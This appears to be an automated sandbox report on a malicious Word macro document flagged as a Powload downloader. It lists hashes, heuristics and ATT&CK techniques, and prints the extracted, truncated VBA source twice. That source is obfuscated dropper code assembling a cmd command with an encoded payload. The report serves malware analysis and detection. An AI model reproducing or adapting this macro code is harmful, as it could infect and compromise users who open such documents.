Office (OLE) malware analysis — malicious · 84319a12c90cdfff

MALICIOUS

Office (OLE)

86.9 KB Created: 2018-08-27 06:56:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 7e92b4f9e36142bdf175c126630e748d SHA-1: f238ebe33bb28691bc22ebbaaf03b3ab694ef367 SHA-256: 84319a12c90cdfff298a362a0cc1d187a4293e3c608f3cec791ee467aafb54f2

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The reconstructed command 'MD /c R^S^t ^ ^ ^B^W^k^q==' suggests an attempt to execute a command, likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Powload-6665573-0' further supports this downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6665573-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6665573-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10719 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10719 bytes
SHA-256: `8814aab09dc59ba772cf4572120bafdea47ea260fc98eec723e14b9c0f618f81`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vFaGzvnzUEhwmj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BvhZomkHo" Function vKUBCCc() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error EzGWm / dJpID * 32994 / Qavrlu Error 43843 / pjbjA / DidBtt * kGGqm Error wYFjSl * 39632 zqczaXLFk = "MD" + " " + "/" + "v^ /" + "R" + Chr(2 + 3 + 3 + 5 + 21) + " ^S^E" + "^t " + "^ ^ ^B^" + "W^k^q==" Error 73855 / zjIYA * TPJRSk / kFhaS Error 13428 * HsCNV * MuhiFl / juabb Nmmluf = "^A^A" + "I^A^AC" + "Ag^AAIA" + "AC^" + "A^gAA" + "^I^A^A" + "C^A" + "^g^" + "AA^I^" + "A^" + "A" + "CA^g^A" + "^" Error 26634 * bbaVVB Error 99457 * KlVjb * 11094 * 33492 Error 74629 / ztAKH * 97699 / awDPRb Error 13695 * 39492 Error udfDp / GLfPHV wzNIEQhQtOl = "A^" + "I" + "AA" + "C^" + "Ag^AA^" Error CsQoNb * 54479 * 41036 * BNECiz Error 29350 / 60381 * Zooct / MIcfB Error LXjSj * fYXRT / psQlEI / lchAO Error 44928 / 24868 * KnSzq * rpCnrk Error fYfLz * GCltcG * 5939 / iuduLw hOKcNsDuVn = "IA" + "AC" + "A9" + "^" + "BQf^A^s" + "^H^A^o" + "Bw^" + "Y" + "^A^" Error dTbVz / drrXfI Error HLOPK * bWSpjh / moChhl / 15703 QQhMNBl = "QH" + "Ah^B^wY" + "^" + "A0HA^" + "7^Aw" + "^a" + "AEGAlB" + "gcA^IGA" + "^7^A^QV" + "AY" + "^E^A^qB" + "^A^J" + "A^AC^At" Error 44465 / Nojwa Error MCWJfv / fLzjrM Error 85393 / BmoSj * CpqwXB / 46134 Error 19396 * 40526 * 65405 / uccVT oVHipq = "B^Q^ZA" + "^Q" + "^HA^J" + "^BQL" + "AU^GAr" Error EPufk * vFptl / 68356 / zjrUo Error uDzGRT / JITNSr / YIsRj / iVdjc Error 37549 / XMLJHd / 35775 * ApPijT fuEXkCrjuC = "B^w^bAY" + "^" + "HA^u^BQ" + "S" + "A^sDApA" + "QVA" + "Y" + "^EA" + "^qB^A" + "^JAACA" + "^sA" Error WEbiu * ZkRMf * aCAoP / 99312 zBQzLB = "^A^a^A^" + "8" + "E" + "^A3^B" + "^A^" + "J" + "A^gC" + "AlBA" + "bAk^G" + "^AGB" Error 33369 * mSmiv / aPiLi / 65417 Error rjYdz / rflccj / pUczL * PSJrMS rqzVGGONDjQ = "AZA^" + "EG" + "Av" + "B" + "AbA4G^A" + "^3" + "^B^" + "w^b" + "^AQ" Error 2863 / TZsOww / bdjdOG / KFPDlv LtwKVVr = "EA^uA^g" + "^W^A" + "^Y^E" + "^" + "Ay^" + "B" Error 36517 / YlirLL / 92926 * qzRDkS Error LOoPSk / 97854 Error 63587 / DzYGj * 10901 / 11846 Error 85150 * BUfJAL dYGNpijwQi = "A^JA" + "sH" + "A^5^Bgc" + "AQHA7B" + "QKAY" + "^E" + "^A^tB" + "^" + "gUA^Q" + "C" + "^A" + "^gAgb^" + "Ak^G^A^" Error 30221 / VzftH PvlSjwuJ = "g^AA" + "^aA8^E" + "^A^3BA" + "^" + "JA^gCA" vKUBCCc = zqczaXLFk + Nmmluf + wzNIEQhQtOl + hOKcNsDuVn + QQhMNBl + oVHipq + fuEXkCrjuC + zBQzLB + rqzVGGONDjQ + LtwKVVr + dYGNpijwQi + PvlSjwuJ Error cMdzlB * KcBLZk Error lXZGKF * zGkQM End Function Function VjEGP() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 91953 / ukUBh Error osDKjU * PIOss Error 21628 / lHiKK Error 17520 / PBlwP Error kAibKa / UaqKR tfLri = "^o" + "B^w" + "YAEG^A" + "lB^gc^" + "A8G^A^m" Error 4568 / 55545 Error TPiMv / hEroM * bkhHB * AFktbG Error ajWNN / qJDQCI * fHKst * oBiJHO YASttRzV = "Bw^O^Ac" + "C" + "Al^BAe" + "^AUG^Au" + "^A^" Error aPVfk / DTaIV Error 50572 * 27535 * 98259 / YWtUEG DKzQidCZI = "wJA^sC^" + "A^3^B^w" + "Q^A^" + "k" + "G^A^k" + "^A^w" + "^K^AcCA" + "c^B^wJ^" + "AsC^" + "AjBQ^a" Error mzfLjJ * 57753 Error 71138 * ocrtq / 30147 / RaNiC vPdJiLXMlRI = "Aw" + "^G^" + "Ai^BQd^" + "A^" + "A^HA6" + "^" + "Ag^d^A" + "^4^G" + "Al^B" + "^AJA0D^" + "AV^B^" Error CwbvjB * DRRvz Error pPQjvj * NcufJ / 18710 * jjSdGB Error pZzRSs * tnzErN / wGOwv / CJpfn Error LBVqGJ * oSwOoM / ZvsbYo / jPZrX GcPHkicSwu = "g" + "R^A" + "^o^GA" + "^kA^w^" + "O" + "^A" + "cC^Aw" + "^AA" + "^OA^Y^D" Error 28254 / 8133 Error focjv * VmJXk / 60209 * uZimvz Error 99080 / sftuD Error zoAGiv * qKjow ... (truncated)

SHA-256: 8814aab09dc59ba772cf4572120bafdea47ea260fc98eec723e14b9c0f618f81

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vFaGzvnzUEhwmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BvhZomkHo"
Function vKUBCCc()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error EzGWm / dJpID * 32994 / Qavrlu
   Error 43843 / pjbjA / DidBtt * kGGqm
   Error wYFjSl * 39632
zqczaXLFk = "MD" + " " + "/" + "v^ /" + "R" + Chr(2 + 3 + 3 + 5 + 21) + " ^S^E" + "^t  " + "^ ^ ^B^" + "W^k^q=="
Error 73855 / zjIYA * TPJRSk / kFhaS
   Error 13428 * HsCNV * MuhiFl / juabb
Nmmluf = "^A^A" + "I^A^AC" + "Ag^AAIA" + "AC^" + "A^gAA" + "^I^A^A" + "C^A" + "^g^" + "AA^I^" + "A^" + "A" + "CA^g^A" + "^"
Error 26634 * bbaVVB
   Error 99457 * KlVjb * 11094 * 33492
   Error 74629 / ztAKH * 97699 / awDPRb
   Error 13695 * 39492
   Error udfDp / GLfPHV
wzNIEQhQtOl = "A^" + "I" + "AA" + "C^" + "Ag^AA^"
Error CsQoNb * 54479 * 41036 * BNECiz
   Error 29350 / 60381 * Zooct / MIcfB
   Error LXjSj * fYXRT / psQlEI / lchAO
   Error 44928 / 24868 * KnSzq * rpCnrk
   Error fYfLz * GCltcG * 5939 / iuduLw
hOKcNsDuVn = "IA" + "AC" + "A9" + "^" + "BQf^A^s" + "^H^A^o" + "Bw^" + "Y" + "^A^"
Error dTbVz / drrXfI
   Error HLOPK * bWSpjh / moChhl / 15703
QQhMNBl = "QH" + "Ah^B^wY" + "^" + "A0HA^" + "7^Aw" + "^a" + "AEGAlB" + "gcA^IGA" + "^7^A^QV" + "AY" + "^E^A^qB" + "^A^J" + "A^AC^At"
Error 44465 / Nojwa
   Error MCWJfv / fLzjrM
   Error 85393 / BmoSj * CpqwXB / 46134
   Error 19396 * 40526 * 65405 / uccVT
oVHipq = "B^Q^ZA" + "^Q" + "^HA^J" + "^BQL" + "AU^GAr"
Error EPufk * vFptl / 68356 / zjrUo
   Error uDzGRT / JITNSr / YIsRj / iVdjc
   Error 37549 / XMLJHd / 35775 * ApPijT
fuEXkCrjuC = "B^w^bAY" + "^" + "HA^u^BQ" + "S" + "A^sDApA" + "QVA" + "Y" + "^EA" + "^qB^A" + "^JAACA" + "^sA"
Error WEbiu * ZkRMf * aCAoP / 99312
zBQzLB = "^A^a^A^" + "8" + "E" + "^A3^B" + "^A^" + "J" + "A^gC" + "AlBA" + "bAk^G" + "^AGB"
Error 33369 * mSmiv / aPiLi / 65417
   Error rjYdz / rflccj / pUczL * PSJrMS
rqzVGGONDjQ = "AZA^" + "EG" + "Av" + "B" + "AbA4G^A" + "^3" + "^B^" + "w^b" + "^AQ"
Error 2863 / TZsOww / bdjdOG / KFPDlv
LtwKVVr = "EA^uA^g" + "^W^A" + "^Y^E" + "^" + "Ay^" + "B"
Error 36517 / YlirLL / 92926 * qzRDkS
   Error LOoPSk / 97854
   Error 63587 / DzYGj * 10901 / 11846
   Error 85150 * BUfJAL
dYGNpijwQi = "A^JA" + "sH" + "A^5^Bgc" + "AQHA7B" + "QKAY" + "^E" + "^A^tB" + "^" + "gUA^Q" + "C" + "^A" + "^gAgb^" + "Ak^G^A^"
Error 30221 / VzftH
PvlSjwuJ = "g^AA" + "^aA8^E" + "^A^3BA" + "^" + "JA^gCA"
vKUBCCc = zqczaXLFk + Nmmluf + wzNIEQhQtOl + hOKcNsDuVn + QQhMNBl + oVHipq + fuEXkCrjuC + zBQzLB + rqzVGGONDjQ + LtwKVVr + dYGNpijwQi + PvlSjwuJ
   Error cMdzlB * KcBLZk
   Error lXZGKF * zGkQM
End Function
Function VjEGP()
On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next

On Error Resume Next
Error 91953 / ukUBh
   Error osDKjU * PIOss
   Error 21628 / lHiKK
   Error 17520 / PBlwP
   Error kAibKa / UaqKR
tfLri = "^o" + "B^w" + "YAEG^A" + "lB^gc^" + "A8G^A^m"
Error 4568 / 55545
   Error TPiMv / hEroM * bkhHB * AFktbG
   Error ajWNN / qJDQCI * fHKst * oBiJHO
YASttRzV = "Bw^O^Ac" + "C" + "Al^BAe" + "^AUG^Au" + "^A^"
Error aPVfk / DTaIV
   Error 50572 * 27535 * 98259 / YWtUEG
DKzQidCZI = "wJA^sC^" + "A^3^B^w" + "Q^A^" + "k" + "G^A^k" + "^A^w" + "^K^AcCA" + "c^B^wJ^" + "AsC^" + "AjBQ^a"
Error mzfLjJ * 57753
   Error 71138 * ocrtq / 30147 / RaNiC
vPdJiLXMlRI = "Aw" + "^G^" + "Ai^BQd^" + "A^" + "A^HA6" + "^" + "Ag^d^A" + "^4^G" + "Al^B" + "^AJA0D^" + "AV^B^"
Error CwbvjB * DRRvz
   Error pPQjvj * NcufJ / 18710 * jjSdGB
   Error pZzRSs * tnzErN / wGOwv / CJpfn
   Error LBVqGJ * oSwOoM / ZvsbYo / jPZrX
GcPHkicSwu = "g" + "R^A" + "^o^GA" + "^kA^w^" + "O" + "^A" + "cC^Aw" + "^AA" + "^OA^Y^D"
Error 28254 / 8133
   Error focjv * VmJXk / 60209 * uZimvz
   Error 99080 / sftuD
   Error zoAGiv * qKjow
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.